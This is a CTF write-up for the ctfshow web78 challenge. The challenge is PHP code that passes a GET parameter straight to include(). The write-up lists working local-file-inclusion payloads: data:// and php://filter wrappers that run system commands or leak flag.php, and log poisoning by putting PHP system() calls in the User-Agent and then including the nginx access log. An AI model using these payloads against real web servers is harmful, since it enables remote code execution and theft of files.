[ctfshow web入门] web78

一口一个橘子2025-06-04 19:01

信息收集

表面上没有任何过滤,自由发挥

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

这些解法都在web32解释过,不再详细解释,有需要点击超链接:[ctfshow web入门] web32

伪协议

php 复制代码 
?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

web124    目录    web79

相关推荐
海市公约1 小时前
HTML网页开发从入门到精通:从标签到表单的完整指南
前端·ide·vscode·程序人生·架构·前端框架·html
行云流水6261 小时前
前端树形结构实现勾选,半勾选,取消勾选。
前端·算法
diudiu_332 小时前
web漏洞--认证缺陷
java·前端·网络
阿珊和她的猫2 小时前
<video>` 和 `<audio>` 标签的常用属性解析
前端
LSL666_2 小时前
4 jQuery、JavaScript 作用域、闭包与 DOM 事件绑定
前端·javascript·html
yinuo3 小时前
前端跨页面通讯终极指南⑤:window.name 用法全解析
前端
小飞侠在吗3 小时前
vue computed 和 watch
前端·javascript·vue.js
yinuo3 小时前
前端跨页面通讯终极指南④:MessageChannel 用法全解析
前端
cike_y3 小时前
浅谈用docker搭建一个ctf镜像
运维·安全·网络安全·docker·容器·ctf
前端布鲁伊3 小时前
聊聊前端容易翻车的“环境管理”
前端·面试
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05UV安装并设置国内源06BongoCat - 跨平台键盘猫动画工具07React CVE-2025-55182漏洞排查与修复指南08Linux下V2Ray安装配置指南09打造高效订单处理!ZKmall开源商城的统一履约中心架构解析10本地部署阿里最新开源的Z-Image